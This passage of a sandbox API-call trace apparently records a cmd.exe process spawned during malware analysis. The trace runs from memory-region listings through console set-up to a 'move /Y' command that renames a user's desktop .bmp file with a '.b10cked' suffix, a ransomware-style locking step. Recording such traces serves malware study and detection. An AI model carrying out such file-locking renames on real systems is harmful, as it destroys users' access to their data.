0x630000 end_va = 0x63ffff entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 33229 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = 
mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 33230 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 33231 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 33232 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 33233 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 33234 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 33235 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 33236 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 33237 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 33238 start_va = 0x250000 end_va = 0x317fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000000250000" filename = "" Region: id = 33239 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 33240 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 33241 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 33242 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 33243 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 33244 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 33245 start_va = 0x440000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 33246 start_va = 0x640000 end_va = 0x123ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 33247 start_va = 0x1240000 end_va = 0x13a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001240000" filename = "" Thread: id = 777 os_tid = 0xfec [0220.834] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24fe74 | out: lpSystemTimeAsFileTime=0x24fe74*(dwLowDateTime=0xb86dc7c0, dwHighDateTime=0x1d440a9)) [0220.834] GetCurrentProcessId () returned 0xe84 [0220.834] GetCurrentThreadId () returned 0xfec [0220.834] GetTickCount () returned 0x3d9ea [0220.834] QueryPerformanceCounter (in: lpPerformanceCount=0x24fe6c | out: 
lpPerformanceCount=0x24fe6c*=27762357899) returned 1 [0220.835] GetModuleHandleA (lpModuleName=0x0) returned 0x4a1c0000 [0220.835] __set_app_type (_Type=0x1) [0220.835] __p__fmode () returned 0x76b331f4 [0220.835] __p__commode () returned 0x76b331fc [0220.835] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a1e21a6) returned 0x0 [0220.835] __getmainargs (in: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c, _DoWildCard=0, _StartInfo=0x4a1e4140 | out: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c) returned 0 [0220.836] GetCurrentThreadId () returned 0xfec [0220.836] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xfec) returned 0x38 [0220.836] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0220.836] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0220.836] SetThreadUILanguage (LangId=0x0) returned 0x409 [0220.836] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0220.836] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24fe04 | out: phkResult=0x24fe04*=0x0) returned 0x2 [0220.836] VirtualQuery (in: lpAddress=0x24fe3b, lpBuffer=0x24fdd4, dwLength=0x1c | out: lpBuffer=0x24fdd4*(BaseAddress=0x24f000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0220.836] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x24fdd4, dwLength=0x1c | out: lpBuffer=0x24fdd4*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0220.836] VirtualQuery (in: lpAddress=0x151000, lpBuffer=0x24fdd4, dwLength=0x1c | out: lpBuffer=0x24fdd4*(BaseAddress=0x151000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, 
Type=0x20000)) returned 0x1c [0220.836] VirtualQuery (in: lpAddress=0x153000, lpBuffer=0x24fdd4, dwLength=0x1c | out: lpBuffer=0x24fdd4*(BaseAddress=0x153000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0220.836] VirtualQuery (in: lpAddress=0x250000, lpBuffer=0x24fdd4, dwLength=0x1c | out: lpBuffer=0x24fdd4*(BaseAddress=0x250000, AllocationBase=0x250000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0220.836] GetConsoleOutputCP () returned 0x1b5 [0220.837] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.837] SetConsoleCtrlHandler (HandlerRoutine=0x4a1de72a, Add=1) returned 1 [0220.837] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.837] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0220.837] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.837] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0220.837] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.837] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0220.837] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.837] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0220.838] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.838] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0220.838] GetEnvironmentStringsW () returned 0x350180* [0220.838] FreeEnvironmentStringsW (penv=0x350180) returned 1 [0220.838] GetEnvironmentStringsW () returned 0x350180* [0220.838] FreeEnvironmentStringsW (penv=0x350180) returned 1 [0220.838] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24ed74 | out: phkResult=0x24ed74*=0x40) returned 0x0 [0220.839] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, 
lpType=0x24ed7c, lpData=0x24ed80, lpcbData=0x24ed78*=0x1000 | out: lpType=0x24ed7c*=0x0, lpData=0x24ed80*=0xa8, lpcbData=0x24ed78*=0x1000) returned 0x2 [0220.839] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24ed7c, lpData=0x24ed80, lpcbData=0x24ed78*=0x1000 | out: lpType=0x24ed7c*=0x4, lpData=0x24ed80*=0x1, lpcbData=0x24ed78*=0x4) returned 0x0 [0220.839] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24ed7c, lpData=0x24ed80, lpcbData=0x24ed78*=0x1000 | out: lpType=0x24ed7c*=0x0, lpData=0x24ed80*=0x1, lpcbData=0x24ed78*=0x1000) returned 0x2 [0220.839] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24ed7c, lpData=0x24ed80, lpcbData=0x24ed78*=0x1000 | out: lpType=0x24ed7c*=0x4, lpData=0x24ed80*=0x0, lpcbData=0x24ed78*=0x4) returned 0x0 [0220.839] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24ed7c, lpData=0x24ed80, lpcbData=0x24ed78*=0x1000 | out: lpType=0x24ed7c*=0x4, lpData=0x24ed80*=0x40, lpcbData=0x24ed78*=0x4) returned 0x0 [0220.839] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24ed7c, lpData=0x24ed80, lpcbData=0x24ed78*=0x1000 | out: lpType=0x24ed7c*=0x4, lpData=0x24ed80*=0x40, lpcbData=0x24ed78*=0x4) returned 0x0 [0220.839] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24ed7c, lpData=0x24ed80, lpcbData=0x24ed78*=0x1000 | out: lpType=0x24ed7c*=0x0, lpData=0x24ed80*=0x40, lpcbData=0x24ed78*=0x1000) returned 0x2 [0220.839] RegCloseKey (hKey=0x40) returned 0x0 [0220.839] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24ed74 | out: phkResult=0x24ed74*=0x40) returned 0x0 [0220.839] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24ed7c, lpData=0x24ed80, lpcbData=0x24ed78*=0x1000 | out: 
lpType=0x24ed7c*=0x0, lpData=0x24ed80*=0x40, lpcbData=0x24ed78*=0x1000) returned 0x2 [0220.839] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24ed7c, lpData=0x24ed80, lpcbData=0x24ed78*=0x1000 | out: lpType=0x24ed7c*=0x4, lpData=0x24ed80*=0x1, lpcbData=0x24ed78*=0x4) returned 0x0 [0220.839] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24ed7c, lpData=0x24ed80, lpcbData=0x24ed78*=0x1000 | out: lpType=0x24ed7c*=0x0, lpData=0x24ed80*=0x1, lpcbData=0x24ed78*=0x1000) returned 0x2 [0220.839] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24ed7c, lpData=0x24ed80, lpcbData=0x24ed78*=0x1000 | out: lpType=0x24ed7c*=0x4, lpData=0x24ed80*=0x0, lpcbData=0x24ed78*=0x4) returned 0x0 [0220.839] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24ed7c, lpData=0x24ed80, lpcbData=0x24ed78*=0x1000 | out: lpType=0x24ed7c*=0x4, lpData=0x24ed80*=0x9, lpcbData=0x24ed78*=0x4) returned 0x0 [0220.839] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24ed7c, lpData=0x24ed80, lpcbData=0x24ed78*=0x1000 | out: lpType=0x24ed7c*=0x4, lpData=0x24ed80*=0x9, lpcbData=0x24ed78*=0x4) returned 0x0 [0220.839] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24ed7c, lpData=0x24ed80, lpcbData=0x24ed78*=0x1000 | out: lpType=0x24ed7c*=0x0, lpData=0x24ed80*=0x9, lpcbData=0x24ed78*=0x1000) returned 0x2 [0220.839] RegCloseKey (hKey=0x40) returned 0x0 [0220.839] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b6 [0220.839] srand (_Seed=0x5b8863b6) [0220.839] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\9CDGYB~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\9CDgy bLN0e-uZnqSYBc.bmp.b10cked\"" [0220.840] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y 
\"C:\\Users\\EEBsYm5\\Desktop\\9CDGYB~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\9CDgy bLN0e-uZnqSYBc.bmp.b10cked\"" [0220.840] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.840] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3518e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0220.840] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0220.840] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0220.840] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0220.840] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0220.840] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0220.841] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0220.841] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0220.841] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0220.841] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0220.841] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0220.841] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0220.841] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0220.841] GetEnvironmentStringsW () returned 0x3522d0* [0220.841] FreeEnvironmentStringsW (penv=0x3522d0) returned 1 [0220.841] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.841] GetEnvironmentVariableW (in: lpName="KEYS", 
lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0220.841] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0220.841] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0220.841] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0220.841] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0220.841] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0220.841] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0220.841] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0220.841] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0220.841] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x24fb40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.841] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x24fb40, lpFilePart=0x24fb3c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x24fb3c*="Desktop") returned 0x18 [0220.842] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.842] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x24f8bc | out: lpFindFileData=0x24f8bc) returned 0x350010 [0220.842] FindClose (in: hFindFile=0x350010 | out: hFindFile=0x350010) returned 1 [0220.842] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x24f8bc | out: lpFindFileData=0x24f8bc) returned 0x350010 [0220.842] FindClose (in: hFindFile=0x350010 | out: hFindFile=0x350010) returned 1 [0220.842] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x24f8bc | out: lpFindFileData=0x24f8bc) returned 0x350010 [0220.842] FindClose (in: hFindFile=0x350010 | out: hFindFile=0x350010) returned 1 [0220.842] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.843] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" 
(normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0220.843] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0220.843] GetEnvironmentStringsW () returned 0x352af0* [0220.843] FreeEnvironmentStringsW (penv=0x352af0) returned 1 [0220.843] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.843] GetConsoleOutputCP () returned 0x1b5 [0220.844] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.844] GetUserDefaultLCID () returned 0x409 [0220.844] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a1e4950, cchData=8 | out: lpLCData=":") returned 2 [0220.844] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x24fc80, cchData=128 | out: lpLCData="0") returned 2 [0220.844] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x24fc80, cchData=128 | out: lpLCData="0") returned 2 [0220.844] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x24fc80, cchData=128 | out: lpLCData="1") returned 2 [0220.844] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a1e4940, cchData=8 | out: lpLCData="/") returned 2 [0220.844] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a1e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0220.845] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a1e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0220.845] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a1e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0220.845] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a1e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0220.845] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a1e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0220.845] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a1e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0220.845] GetLocaleInfoW (in: 
Locale=0x409, LCType=0x37, lpLCData=0x4a1e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0220.845] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a1e4930, cchData=8 | out: lpLCData=".") returned 2 [0220.845] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a1e4920, cchData=8 | out: lpLCData=",") returned 2 [0220.845] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0220.846] GetConsoleTitleW (in: lpConsoleTitle=0x3408e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.846] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0220.846] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0220.846] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0220.846] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0220.847] _wcsicmp (_String1="move", _String2=")") returned 68 [0220.847] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0220.847] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0220.847] _wcsicmp (_String1="IF", _String2="move") returned -4 [0220.847] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0220.847] _wcsicmp (_String1="REM", _String2="move") returned 5 [0220.847] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0220.851] GetConsoleTitleW (in: lpConsoleTitle=0x24f978, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.851] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0220.851] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0220.851] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0220.851] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0220.851] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0220.851] _wcsicmp (_String1="move", _String2="CD") returned 10 [0220.851] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 
[0220.851] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0220.851] _wcsicmp (_String1="move", _String2="REN") returned -5 [0220.851] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0220.851] _wcsicmp (_String1="move", _String2="SET") returned -6 [0220.852] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0220.852] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0220.852] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0220.852] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0220.852] _wcsicmp (_String1="move", _String2="MD") returned 11 [0220.852] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0220.852] _wcsicmp (_String1="move", _String2="RD") returned -5 [0220.852] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0220.852] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0220.852] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0220.852] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0220.852] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0220.852] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0220.852] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0220.852] _wcsicmp (_String1="move", _String2="VER") returned -9 [0220.852] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0220.852] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0220.852] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0220.852] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0220.852] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0220.852] _wcsicmp (_String1="move", _String2="START") returned -6 [0220.852] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0220.852] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0220.852] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0220.854] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0220.854] GetDriveTypeW (lpRootPathName="C:\\") returned 
0x3 [0220.854] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x24f734, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x24f72c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x24f72c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.855] _wcsnicmp (_String1="COPYCMD", 
_String2="PROCESS", _MaxCount=0x7) returned -13 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0220.856] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0220.856] _wcsicmp (_String1="9CDGYB~1.BMP", _String2=".") returned 11 [0220.856] _wcsicmp (_String1="9CDGYB~1.BMP", _String2="..") returned 11 [0220.856] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\9CDGYB~1.BMP" (normalized: "c:\\users\\eebsym5\\desktop\\9cdgyb~1.bmp")) returned 0x20 [0220.856] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x351e38 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.856] SetErrorMode (uMode=0x0) returned 0x0 [0220.856] SetErrorMode (uMode=0x1) returned 0x0 [0220.856] GetFullPathNameW (in: 
